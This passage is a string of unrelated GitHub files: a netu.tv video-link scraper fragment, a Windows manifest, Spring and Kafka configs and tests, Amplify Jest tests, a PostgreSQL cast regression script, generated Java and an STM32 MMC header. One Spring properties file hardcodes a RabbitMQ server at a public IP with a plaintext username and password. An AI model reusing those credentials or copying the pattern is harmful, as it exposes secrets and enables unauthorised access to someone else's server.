#sReponseCookie = aHeader.getheader("Set-Cookie")
sPhpSessionId = self.__getPhpSessionId(aHeader)
#data = self.getPage(playerUrl, {'header' : HTTP_HEADER}, post_data)
#CParsingHelper.writeToFile('/home/sulge/test.html', data)
print aHeader
print data.read()
def getUtf8Str(st):
idx = 0
st2 = ''
while idx < len(st):
st2 += '\\u0' + st[idx:idx + 3]
idx += 3
return st2.decode('unicode-escape').encode('UTF-8')
file_vars = self.getDataBeetwenMarkers(data, 'Uppod(', ')', False)[1]
print "lalala"
print file_vars
file_vars = self.getDataBeetwenMarkers(data, 'file:', ',', False)[1].strip()
file_vars = file_vars.split('+')
file_url = ''
for file_var in file_vars:
file_var = file_var.strip()
if 0 < len(file_var):
match = re.search('''["']([^"]*?)["']''', file_var)
if match:
file_url += match.group(1)
else:
file_url += re.search('''var[ ]+%s[ ]*=[ ]*["']([^"]*?)["']''' % file_var, data).group(1)
if file_url.startswith('#') and 3 < len(file_url):
file_url = getUtf8Str(file_url[1:])
print "[[[[[[[[[[[[[[[[[[[[[[%r]" % file_url
if file_url.startswith('http'):
return file_url
return False
def __getMediaLinkForGuest(self):
#host = self.parseNETUTV(self.__sUrl)
oRequest = cRequestHandler('http://netu.tv/watch_video.php?v=S7DGB15KBN6N')
sHtmlContent = oRequest.request()
aHeader = oRequest.getResponseHeader()
sPhpSessionId = self.__getPhpSessionId(aHeader)
sPattern = '<meta property="og:image" content="([^"]+)" />'
oParser = cParser()
aResult = oParser.parse(sHtmlContent, sPattern)
print sHtmlContent
if (aResult[0] == True):
api_call = aResult[1][0]
return True, api_call
return False, False
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
</assembly>
| {
"pile_set_name": "Github"
} |
spring.application.name=mq-service
server.port=8088
eureka.client.serviceUrl.defaultZone=http://eureka.didispace.com/eureka/
spring.rabbitmq.host=115.29.47.207
spring.rabbitmq.port=5672
spring.rabbitmq.virtualHost=/test
spring.rabbitmq.username=chengzhx76
spring.rabbitmq.password=chengzhx76
| {
"pile_set_name": "Github"
} |
from logging.handlers import BufferingHandler
from gixy.formatters.base import BaseFormatter
class LogHandler(BufferingHandler):
    """Logging handler that stores emitted records for later inspection.

    Each record is kept as its ``__dict__`` snapshot in ``self.buffer`` and
    is never flushed automatically; call ``flush()`` explicitly to clear the
    buffer.  A matcher object decides whether a stored record satisfies a
    query (see ``matches``).
    """

    def __init__(self, matcher):
        # Capacity 0 is fine because shouldFlush() is overridden below to
        # never trigger; flushing only ever happens explicitly.
        super(LogHandler, self).__init__(0)
        self.matcher = matcher

    def shouldFlush(self, **kwargs):
        # Never flush automatically.
        return False

    def emit(self, record):
        # Store a dict snapshot instead of the LogRecord itself.
        self.buffer.append(record.__dict__)

    def matches(self, **kwargs):
        """Return True if any buffered record matches the supplied kwargs."""
        return any(self.matcher.matches(stored, **kwargs) for stored in self.buffer)
class Matcher(object):
    """Compares stored log-record dicts against keyword queries.

    Values stored under keys listed in ``_partial_matches`` ('msg' and
    'message') match on substring; every other key requires a same-type,
    exact equality match.
    """

    _partial_matches = ('msg', 'message')

    def matches(self, d, **kwargs):
        """Return True when every supplied kwarg matches the dict ``d``."""
        return all(
            self.match_value(key, d.get(key), expected)
            for key, expected in kwargs.items()
        )

    def match_value(self, k, dv, v):
        """Match one stored value ``dv`` against a supplied ``v`` for key ``k``."""
        # Differing types (including bool vs int) never match.
        if type(v) is not type(dv):
            return False
        # Exact comparison unless this is a message-like string key.
        if type(dv) is not str or k not in self._partial_matches:
            return v == dv
        # Partial (substring) match for message-like keys.
        return dv.find(v) >= 0
| {
"pile_set_name": "Github"
} |
{
"name": "granim",
"description": "Create fluid and interactive gradients animations with this small js library.",
"main": "index.js",
"authors": [
"Benjamin Blonde",
"Pranay Prakash <[email protected]> (http://pranay.gp)"
],
"license": "MIT",
"keywords": [
"gradient",
"animation"
],
"homepage": "https://sarcadass.github.io/granim.js/",
"moduleType": [
"globals",
"node"
],
"ignore": [
"**/.*",
"node_modules",
"bower_components",
"test",
"tests"
]
}
| {
"pile_set_name": "Github"
} |
/******************************************************************************
* Product: Adempiere ERP & CRM Smart Business Solution *
* Copyright (C) 1999-2007 ComPiere, Inc. All Rights Reserved. *
* This program is free software, you can redistribute it and/or modify it *
* under the terms version 2 of the GNU General Public License as published *
* by the Free Software Foundation. This program is distributed in the hope *
* that it will be useful, but WITHOUT ANY WARRANTY, without even the implied *
* warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. *
* See the GNU General Public License for more details. *
* You should have received a copy of the GNU General Public License along *
* with this program, if not, write to the Free Software Foundation, Inc., *
* 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA. *
* For the text or an alternative of this public license, you may reach us *
* ComPiere, Inc., 2620 Augustine Dr. #245, Santa Clara, CA 95054, USA *
* or via [email protected] or http://www.compiere.org/license.html *
*****************************************************************************/
package org.compiere.model;
import java.math.BigDecimal;
import java.sql.Timestamp;
import org.compiere.util.KeyNamePair;
/** Generated model interface for the C_PaymentBatch table (payment batches for EFT).
 *  NOTE: generated by the Adempiere model generator — do not edit by hand;
 *  regenerate from the Application Dictionary instead.
 *  @author Adempiere (generated)
 *  @version Release 3.5.4a
 */
public interface I_C_PaymentBatch
{
    /** TableName=C_PaymentBatch */
    public static final String Table_Name = "C_PaymentBatch";

    /** AD_Table_ID=411 */
    public static final int Table_ID = MTable.getTable_ID(Table_Name);

    KeyNamePair Model = new KeyNamePair(Table_ID, Table_Name);

    /** AccessLevel = 1 - Org
     */
    BigDecimal accessLevel = BigDecimal.valueOf(1);

    /** Load Meta Data */

    /** Column name AD_Client_ID */
    public static final String COLUMNNAME_AD_Client_ID = "AD_Client_ID";

    /** Get Client.
      * Client/Tenant for this installation.
      */
    public int getAD_Client_ID();

    /** Column name AD_Org_ID */
    public static final String COLUMNNAME_AD_Org_ID = "AD_Org_ID";

    /** Set Organization.
      * Organizational entity within client
      */
    public void setAD_Org_ID (int AD_Org_ID);

    /** Get Organization.
      * Organizational entity within client
      */
    public int getAD_Org_ID();

    /** Column name C_PaymentBatch_ID */
    public static final String COLUMNNAME_C_PaymentBatch_ID = "C_PaymentBatch_ID";

    /** Set Payment Batch.
      * Payment batch for EFT
      */
    public void setC_PaymentBatch_ID (int C_PaymentBatch_ID);

    /** Get Payment Batch.
      * Payment batch for EFT
      */
    public int getC_PaymentBatch_ID();

    /** Column name C_PaymentProcessor_ID */
    public static final String COLUMNNAME_C_PaymentProcessor_ID = "C_PaymentProcessor_ID";

    /** Set Payment Processor.
      * Payment processor for electronic payments
      */
    public void setC_PaymentProcessor_ID (int C_PaymentProcessor_ID);

    /** Get Payment Processor.
      * Payment processor for electronic payments
      */
    public int getC_PaymentProcessor_ID();

    public I_C_PaymentProcessor getC_PaymentProcessor() throws RuntimeException;

    /** Column name Created */
    public static final String COLUMNNAME_Created = "Created";

    /** Get Created.
      * Date this record was created
      */
    public Timestamp getCreated();

    /** Column name CreatedBy */
    public static final String COLUMNNAME_CreatedBy = "CreatedBy";

    /** Get Created By.
      * User who created this record
      */
    public int getCreatedBy();

    /** Column name DocumentNo */
    public static final String COLUMNNAME_DocumentNo = "DocumentNo";

    /** Set Document No.
      * Document sequence number of the document
      */
    public void setDocumentNo (String DocumentNo);

    /** Get Document No.
      * Document sequence number of the document
      */
    public String getDocumentNo();

    /** Column name IsActive */
    public static final String COLUMNNAME_IsActive = "IsActive";

    /** Set Active.
      * The record is active in the system
      */
    public void setIsActive (boolean IsActive);

    /** Get Active.
      * The record is active in the system
      */
    public boolean isActive();

    /** Column name Name */
    public static final String COLUMNNAME_Name = "Name";

    /** Set Name.
      * Alphanumeric identifier of the entity
      */
    public void setName (String Name);

    /** Get Name.
      * Alphanumeric identifier of the entity
      */
    public String getName();

    /** Column name Processed */
    public static final String COLUMNNAME_Processed = "Processed";

    /** Set Processed.
      * The document has been processed
      */
    public void setProcessed (boolean Processed);

    /** Get Processed.
      * The document has been processed
      */
    public boolean isProcessed();

    /** Column name Processing */
    public static final String COLUMNNAME_Processing = "Processing";

    /** Set Process Now */
    public void setProcessing (boolean Processing);

    /** Get Process Now */
    public boolean isProcessing();

    /** Column name ProcessingDate */
    public static final String COLUMNNAME_ProcessingDate = "ProcessingDate";

    /** Set Processing date */
    public void setProcessingDate (Timestamp ProcessingDate);

    /** Get Processing date */
    public Timestamp getProcessingDate();

    /** Column name Updated */
    public static final String COLUMNNAME_Updated = "Updated";

    /** Get Updated.
      * Date this record was updated
      */
    public Timestamp getUpdated();

    /** Column name UpdatedBy */
    public static final String COLUMNNAME_UpdatedBy = "UpdatedBy";

    /** Get Updated By.
      * User who updated this record
      */
    public int getUpdatedBy();
}
| {
"pile_set_name": "Github"
} |
jest.mock('fs-extra');
jest.mock('open');
jest.mock('../../../lib/S3AndCloudFront/configuration-manager');
jest.mock('../../../lib/S3AndCloudFront/helpers/file-uploader');
jest.mock('../../../lib/S3AndCloudFront/helpers/cloudfront-manager');
const fs = require('fs-extra');
const path = require('path');
const open = require('open');
const inquirer = require('inquirer');
const mockirer = require('mockirer');
const configManager = require('../../../lib/S3AndCloudFront/configuration-manager');
const fileUPloader = require('../../../lib/S3AndCloudFront/helpers/file-uploader');
const cloudFrontManager = require('../../../lib/S3AndCloudFront/helpers/cloudfront-manager');
const internalTemplateContents = require('../../../lib/S3AndCloudFront/template.json');
const internalParametersContents = require('../../../lib/S3AndCloudFront/parameters.json');
const mockTemplate = require('../../../__mocks__/mockTemplate');
const mockParameters = require('../../../__mocks__/mockParameters');
const serviceName = 'S3AndCloudFront';
const providerPlugin = 'awscloudformation';
const templateFileName = 'template.json';
const parametersFileName = 'parameters.json';
const DEV = 'DEV (S3 only with HTTP)';
const PROD = 'PROD (S3 with CloudFront using HTTPS)';
const Environments = [DEV, PROD];
const s3IndexModule = require('../../../lib/S3AndCloudFront/index');
// Unit tests for the S3AndCloudFront hosting category index module.
// Everything that touches the filesystem, the browser (open), or AWS is mocked
// above; these tests only verify that index.js delegates to the right helpers.
describe('s3IndexModule', () => {
  // Paths of the templates bundled with the plugin itself (as opposed to the
  // project-local copies); used to decide which mock content readFileSync returns.
  const INTERNAL_TEMPLATE_FILE_PATH = path.normalize(path.join(__dirname, '../../../lib/', templateFileName));
  const INTERNAL_PARAMETERS_FILE_PATH = path.normalize(path.join(__dirname, '../../../lib/', parametersFileName));

  // Minimal amplify-meta snapshot with one provider and one hosting resource,
  // mirroring what a real pushed project would contain.
  const mockAmplifyMeta = {
    providers: {
      awscloudformation: {
        AuthRoleName: 'checkhosting-20190226163640-authRole',
        UnauthRoleArn: 'arn:aws:iam::mockAccountId:role/checkhosting-20190226163640-unauthRole',
        AuthRoleArn: 'arn:aws:iam::mockAccountId:role/checkhosting-20190226163640-authRole',
        Region: 'us-west-2',
        DeploymentBucketName: 'checkhosting-20190226163640-deployment',
        UnauthRoleName: 'checkhosting-20190226163640-unauthRole',
        StackName: 'checkhosting-20190226163640',
        StackId: 'arn:aws:cloudformation:us-west-2:mockAccountId:stack/checkhosting-20190226163640/2c061610-3a28-11e9-acf3-02ee71065ed8',
      },
    },
    hosting: {
      S3AndCloudFront: {
        service: 'S3AndCloudFront',
        providerPlugin: 'awscloudformation',
        providerMetadata: {
          s3TemplateURL: 'https://s3.amazonaws.com/checkhosting-20190226163640-deployment/amplify-cfn-templates/hosting/template.json',
          logicalId: 'hostingS3AndCloudFront',
        },
        lastPushTimeStamp: '2019-02-27T00:39:17.966Z',
        output: {
          S3BucketSecureURL: 'https://checkosting-20190226163802-hostingbucket-dev.s3.amazonaws.com',
          WebsiteURL: 'http://checkosting-20190226163802-hostingbucket-dev.s3-website-us-west-2.amazonaws.com',
          Region: 'us-west-2',
          HostingBucketName: 'checkosting-20190226163802-hostingbucket-dev',
        },
        lastPushDirHash: '83Bhmmec48dILMj3mi2T25B4700=',
      },
    },
  };
  // Canned inquirer answer: pick the DEV (S3-only) environment in any prompt.
  const mockAnswers = {
    environment: DEV,
  };
  // Stubbed amplify context passed to every index.js entry point.
  let mockContext = {
    amplify: {
      pathManager: {
        getBackendDirPath: jest.fn(() => {
          return 'mockBackendDirPath';
        }),
      },
      updateamplifyMetaAfterResourceAdd: jest.fn(),
      getProjectMeta: jest.fn(() => {
        return mockAmplifyMeta;
      }),
      readJsonFile: jest.fn(path => JSON.parse(fs.readFileSync(path))),
    },
    print: {
      info: jest.fn(),
      warning: jest.fn(),
      error: jest.fn(),
      success: jest.fn(),
    },
    exeInfo: {
      parameters: {},
      serviceMeta: {
        output: {
          WebsiteURL: 'mockWebsiteURL',
        },
      },
    },
    parameters: {
      options: {},
    },
  };

  beforeAll(() => {
    // Wire inquirer to auto-answer prompts and replace all fs access with
    // deterministic in-memory fakes.
    mockirer(inquirer, mockAnswers);
    fs.ensureDirSync = jest.fn();
    fs.existsSync = jest.fn(() => {
      return true;
    });
    fs.writeFileSync = jest.fn();
    // Serve the plugin-internal template/parameters for internal paths and the
    // project-level mocks for everything else.
    fs.readFileSync = jest.fn(filePath => {
      let result;
      filePath = path.normalize(filePath);
      if (filePath.indexOf(templateFileName) > -1) {
        if (filePath === INTERNAL_TEMPLATE_FILE_PATH) {
          result = JSON.stringify(internalTemplateContents);
        } else {
          result = JSON.stringify(mockTemplate);
        }
      } else if (filePath.indexOf(parametersFileName) > -1) {
        if (filePath === INTERNAL_PARAMETERS_FILE_PATH) {
          result = JSON.stringify(internalParametersContents);
        } else {
          result = JSON.stringify(mockParameters);
        }
      }
      return result;
    });
    fileUPloader.run = jest.fn(() => {
      return Promise.resolve();
    });
    cloudFrontManager.invalidateCloudFront = jest.fn(() => {
      return Promise.resolve();
    });
  });

  beforeEach(() => {
    // Reset call counts on the write-side fs mocks between tests.
    fs.ensureDirSync.mockClear();
    fs.writeFileSync.mockClear();
  });

  // enable() should initialize configuration and register the resource in amplify-meta.
  test('enable', async () => {
    await s3IndexModule.enable(mockContext);
    expect(configManager.init).toBeCalled();
    expect(mockContext.amplify.updateamplifyMetaAfterResourceAdd).toBeCalled();
  });

  // configure() simply delegates to the configuration manager.
  test('configure', async () => {
    await s3IndexModule.configure(mockContext);
    expect(configManager.configure).toBeCalled();
  });

  // publish() uploads the dist folder, invalidates CloudFront, then opens the site URL.
  test('publish', async () => {
    await s3IndexModule.publish(mockContext, { distributionDirPath: 'dist' });
    expect(fileUPloader.run).toBeCalled();
    expect(cloudFrontManager.invalidateCloudFront).toBeCalled();
    expect(open).toBeCalled();
  });

  // console() opens the hosted website URL in the browser.
  test('console', async () => {
    await s3IndexModule.console(mockContext);
    expect(open).toBeCalled();
  });

  // migrate() currently only needs to complete without throwing.
  // NOTE(review): no assertions here — consider verifying the migrated meta/template.
  test('migrate', async () => {
    await s3IndexModule.migrate(mockContext);
  });
});
| {
"pile_set_name": "Github"
} |
--
-- CREATE_CAST
--
-- Regression test for CREATE CAST: exercises binary-coercion casts,
-- I/O-conversion casts, and function-based casts, in both EXPLICIT and
-- IMPLICIT flavors.
--
-- Create some types to test with
CREATE TYPE casttesttype;  -- shell type: placeholder so the I/O functions can reference it
CREATE FUNCTION casttesttype_in(cstring)
   RETURNS casttesttype
   AS 'textin'
   LANGUAGE internal STRICT IMMUTABLE;
CREATE FUNCTION casttesttype_out(casttesttype)
   RETURNS cstring
   AS 'textout'
   LANGUAGE internal STRICT IMMUTABLE;
-- Complete the shell type; it piggybacks on the built-in text I/O routines.
CREATE TYPE casttesttype (
	internallength = variable,
	input = casttesttype_in,
	output = casttesttype_out,
	alignment = int4
);

-- a dummy function to test with
CREATE FUNCTION casttestfunc(casttesttype) RETURNS int4 LANGUAGE SQL AS
$$ SELECT 1; $$;

SELECT casttestfunc('foo'::text); -- fails, as there's no cast

-- Try binary coercion cast
CREATE CAST (text AS casttesttype) WITHOUT FUNCTION;
SELECT casttestfunc('foo'::text); -- doesn't work, as the cast is explicit
SELECT casttestfunc('foo'::text::casttesttype); -- should work
DROP CAST (text AS casttesttype); -- cleanup

-- Try IMPLICIT binary coercion cast
CREATE CAST (text AS casttesttype) WITHOUT FUNCTION AS IMPLICIT;
SELECT casttestfunc('foo'::text); -- Should work now

-- Try I/O conversion cast.
SELECT 1234::int4::casttesttype; -- No cast yet, should fail
CREATE CAST (int4 AS casttesttype) WITH INOUT;
SELECT 1234::int4::casttesttype; -- Should work now
DROP CAST (int4 AS casttesttype);

-- Try cast with a function
CREATE FUNCTION int4_casttesttype(int4) RETURNS casttesttype LANGUAGE SQL AS
$$ SELECT ('foo'::text || $1::text)::casttesttype; $$;
CREATE CAST (int4 AS casttesttype) WITH FUNCTION int4_casttesttype(int4) AS IMPLICIT;
SELECT 1234::int4::casttesttype; -- Should work now
"pile_set_name": "Github"
} |
/*
* Copyright 2018-2019 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.kafka.listener;
import static org.assertj.core.api.Assertions.assertThatExceptionOfType;
import java.util.Collections;
import org.apache.kafka.clients.consumer.ConsumerConfig;
import org.apache.kafka.common.serialization.StringDeserializer;
import org.junit.jupiter.api.BeforeAll;
import org.junit.jupiter.api.Test;
import org.springframework.context.ApplicationContextException;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.kafka.annotation.EnableKafka;
import org.springframework.kafka.annotation.KafkaListener;
import org.springframework.kafka.config.ConcurrentKafkaListenerContainerFactory;
import org.springframework.kafka.core.ConsumerFactory;
import org.springframework.kafka.core.DefaultKafkaConsumerFactory;
import org.springframework.kafka.support.TopicPartitionOffset;
import org.springframework.kafka.test.EmbeddedKafkaBroker;
import org.springframework.kafka.test.condition.EmbeddedKafkaCondition;
import org.springframework.kafka.test.context.EmbeddedKafka;
/**
 * Verifies spring-kafka's fail-fast behavior when no {@code group.id} is
 * configured: containers that <em>subscribe</em> to topics must refuse to
 * start, while containers with explicit partition <em>assignment</em> (which
 * need no consumer group) must start normally.
 *
 * @author Gary Russell
 * @since 2.1.5
 *
 */
@EmbeddedKafka(topics = "missing.group")
public class MissingGroupIdTests {

	private static EmbeddedKafkaBroker embeddedKafka;

	@BeforeAll
	public static void setup() {
		// Broker is started once per class by the EmbeddedKafkaCondition extension.
		embeddedKafka = EmbeddedKafkaCondition.getBroker();
	}

	// @KafkaListener subscribes to a topic, so the missing group.id must abort
	// application-context startup with a descriptive message.
	@Test
	public void testContextFailsWithKafkaListener() {
		assertThatExceptionOfType(ApplicationContextException.class).isThrownBy(() -> {
				new AnnotationConfigApplicationContext(Config1.class);
		})
			.withCauseInstanceOf(IllegalStateException.class)
			.withMessageContaining("No group.id found in consumer config");
	}

	// Same expectation for a manually declared container that subscribes by topic name.
	@Test
	public void testContextFailsWithSubscribedContainer() {
		assertThatExceptionOfType(ApplicationContextException.class).isThrownBy(() -> {
				new AnnotationConfigApplicationContext(Config2.class);
		})
			.withCauseInstanceOf(IllegalStateException.class)
			.withMessageContaining("No group.id found in consumer config");
	}

	// Explicit TopicPartitionOffset assignment requires no consumer group, so
	// the context must load (and is closed immediately).
	@Test
	public void testContextLoadsWithAssignedContainer() {
		new AnnotationConfigApplicationContext(Config3.class).close();
	}

	// Config1: consumer factory without group.id + a @KafkaListener (topic subscription).
	@Configuration
	@EnableKafka
	public static class Config1 {

		@Bean
		public ConsumerFactory<String, String> cf() {
			return new DefaultKafkaConsumerFactory<>(
					Collections.singletonMap(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG,
							embeddedKafka.getBrokersAsString()),
					new StringDeserializer(), new StringDeserializer());
		}

		@Bean
		public ConcurrentKafkaListenerContainerFactory<String, String> kafkaListenerContainerFactory() {
			ConcurrentKafkaListenerContainerFactory<String, String> factory =
					new ConcurrentKafkaListenerContainerFactory<>();
			factory.setConsumerFactory(cf());
			return factory;
		}

		@KafkaListener(topics = "missing.group")
		public void listen(String in) {
			// no op
		}

	}

	// Config2: plain listener container subscribing by topic, still no group.id.
	@Configuration
	@EnableKafka
	public static class Config2 {

		@Bean
		public ConsumerFactory<String, String> cf() {
			return new DefaultKafkaConsumerFactory<>(
					Collections.singletonMap(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG,
							embeddedKafka.getBrokersAsString()),
					new StringDeserializer(), new StringDeserializer());
		}

		@Bean
		public KafkaMessageListenerContainer<String, String> container() {
			ContainerProperties props = new ContainerProperties("missing.group");
			return new KafkaMessageListenerContainer<>(cf(), props);
		}

	}

	// Config3: container with explicit partition assignment — valid without group.id.
	@Configuration
	@EnableKafka
	public static class Config3 {

		@Bean
		public ConsumerFactory<String, String> cf() {
			return new DefaultKafkaConsumerFactory<>(
					Collections.singletonMap(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG,
							embeddedKafka.getBrokersAsString()),
					new StringDeserializer(), new StringDeserializer());
		}

		@Bean
		public KafkaMessageListenerContainer<String, String> container() {
			ContainerProperties props = new ContainerProperties(new TopicPartitionOffset("missing.group", 0));
			props.setMessageListener((MessageListener<String, String>) r -> { });
			return new KafkaMessageListenerContainer<>(cf(), props);
		}

	}

}
| {
"pile_set_name": "Github"
} |
/**
******************************************************************************
* @file stm32f1xx_hal_mmc.h
* @author MCD Application Team
* @brief Header file of MMC HAL module.
******************************************************************************
* @attention
*
* <h2><center>© COPYRIGHT(c) 2017 STMicroelectronics</center></h2>
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
* 1. Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* 3. Neither the name of STMicroelectronics nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
******************************************************************************
*/
/* Define to prevent recursive inclusion -------------------------------------*/
#ifndef __STM32F1xx_HAL_MMC_H
#define __STM32F1xx_HAL_MMC_H
#ifdef __cplusplus
extern "C" {
#endif
#if defined(STM32F103xE) || defined(STM32F103xG)
/* Includes ------------------------------------------------------------------*/
#include "stm32f1xx_ll_sdmmc.h"
/** @addtogroup STM32F1xx_HAL_Driver
* @{
*/
/** @defgroup MMC MMC
* @brief MMC HAL module driver
* @{
*/
/* Exported types ------------------------------------------------------------*/
/** @defgroup MMC_Exported_Types MMC Exported Types
* @{
*/
/** @defgroup MMC_Exported_Types_Group1 MMC State enumeration structure
* @{
*/
/* Driver-level state of an MMC handle (stored in hmmc->State). */
typedef enum
{
  HAL_MMC_STATE_RESET                  = 0x00000000U,  /*!< MMC not yet initialized or disabled  */
  HAL_MMC_STATE_READY                  = 0x00000001U,  /*!< MMC initialized and ready for use    */
  HAL_MMC_STATE_TIMEOUT                = 0x00000002U,  /*!< MMC Timeout state                    */
  HAL_MMC_STATE_BUSY                   = 0x00000003U,  /*!< MMC process ongoing                  */
  HAL_MMC_STATE_PROGRAMMING            = 0x00000004U,  /*!< MMC Programming State                */
  HAL_MMC_STATE_RECEIVING              = 0x00000005U,  /*!< MMC Receiving State                  */
  HAL_MMC_STATE_TRANSFER               = 0x00000006U,  /*!< MMC Transfer State                   */
  HAL_MMC_STATE_ERROR                  = 0x0000000FU   /*!< MMC is in error state                */
}HAL_MMC_StateTypeDef;
/**
* @}
*/
/** @defgroup MMC_Exported_Types_Group2 MMC Card State enumeration structure
* @{
*/
/* Card-side states (NOTE(review): presumably decoded from the card status
   response by the card-state query API in stm32f1xx_hal_mmc.c — confirm). */
typedef enum
{
  HAL_MMC_CARD_READY                   = 0x00000001U,  /*!< Card state is ready                     */
  HAL_MMC_CARD_IDENTIFICATION          = 0x00000002U,  /*!< Card is in identification state         */
  HAL_MMC_CARD_STANDBY                 = 0x00000003U,  /*!< Card is in standby state                */
  HAL_MMC_CARD_TRANSFER                = 0x00000004U,  /*!< Card is in transfer state               */
  HAL_MMC_CARD_SENDING                 = 0x00000005U,  /*!< Card is sending an operation            */
  HAL_MMC_CARD_RECEIVING               = 0x00000006U,  /*!< Card is receiving operation information */
  HAL_MMC_CARD_PROGRAMMING             = 0x00000007U,  /*!< Card is in programming state            */
  HAL_MMC_CARD_DISCONNECTED            = 0x00000008U,  /*!< Card is disconnected                    */
  HAL_MMC_CARD_ERROR                   = 0x000000FFU   /*!< Card response Error                     */
}HAL_MMC_CardStateTypeDef;
/**
* @}
*/
/** @defgroup MMC_Exported_Types_Group3 MMC Handle Structure definition
* @{
*/
#define MMC_InitTypeDef SDIO_InitTypeDef
#define MMC_TypeDef SDIO_TypeDef
/**
* @brief MMC Card Information Structure definition
*/
/* Summary of the connected card, filled by the driver after initialization. */
typedef struct
{
  uint32_t CardType;                     /*!< Specifies the card Type                         */
  uint32_t Class;                        /*!< Specifies the class of the card class           */
  uint32_t RelCardAdd;                   /*!< Specifies the Relative Card Address             */
  uint32_t BlockNbr;                     /*!< Specifies the Card Capacity in blocks           */
  uint32_t BlockSize;                    /*!< Specifies one block size in bytes               */
  uint32_t LogBlockNbr;                  /*!< Specifies the Card logical Capacity in blocks   */
  uint32_t LogBlockSize;                 /*!< Specifies logical block size in bytes           */
}HAL_MMC_CardInfoTypeDef;
/**
* @brief MMC handle Structure definition
*/
/* Main driver handle: peripheral binding, transfer buffers/state, DMA links,
   and the cached card descriptors (CSD/CID). One handle per SDIO instance. */
typedef struct
{
  MMC_TypeDef                  *Instance;        /*!< MMC registers base address           */
  MMC_InitTypeDef              Init;             /*!< MMC required parameters              */
  HAL_LockTypeDef              Lock;             /*!< MMC locking object                   */
  uint32_t                     *pTxBuffPtr;      /*!< Pointer to MMC Tx transfer Buffer    */
  uint32_t                     TxXferSize;       /*!< MMC Tx Transfer size                 */
  uint32_t                     *pRxBuffPtr;      /*!< Pointer to MMC Rx transfer Buffer    */
  uint32_t                     RxXferSize;       /*!< MMC Rx Transfer size                 */
  __IO uint32_t                Context;          /*!< MMC transfer context (combination of MMC_CONTEXT_* flags) */
  __IO HAL_MMC_StateTypeDef    State;            /*!< MMC card State                       */
  __IO uint32_t                ErrorCode;        /*!< MMC Card Error codes                 */
  DMA_HandleTypeDef            *hdmarx;          /*!< MMC Rx DMA handle parameters         */
  DMA_HandleTypeDef            *hdmatx;          /*!< MMC Tx DMA handle parameters         */
  HAL_MMC_CardInfoTypeDef      MmcCard;          /*!< MMC Card information                 */
  uint32_t                     CSD[4U];          /*!< MMC card specific data table         */
  uint32_t                     CID[4U];          /*!< MMC card identification number table */
}MMC_HandleTypeDef;
/**
* @}
*/
/** @defgroup MMC_Exported_Types_Group4 Card Specific Data: CSD Register
* @{
*/
/* Decoded view of the raw Card Specific Data (CSD) register fields. */
typedef struct
{
  __IO uint8_t  CSDStruct;            /*!< CSD structure                         */
  __IO uint8_t  SysSpecVersion;       /*!< System specification version          */
  __IO uint8_t  Reserved1;            /*!< Reserved                              */
  __IO uint8_t  TAAC;                 /*!< Data read access time 1               */
  __IO uint8_t  NSAC;                 /*!< Data read access time 2 in CLK cycles */
  __IO uint8_t  MaxBusClkFrec;        /*!< Max. bus clock frequency              */
  __IO uint16_t CardComdClasses;      /*!< Card command classes                  */
  __IO uint8_t  RdBlockLen;           /*!< Max. read data block length           */
  __IO uint8_t  PartBlockRead;        /*!< Partial blocks for read allowed       */
  __IO uint8_t  WrBlockMisalign;      /*!< Write block misalignment              */
  __IO uint8_t  RdBlockMisalign;      /*!< Read block misalignment               */
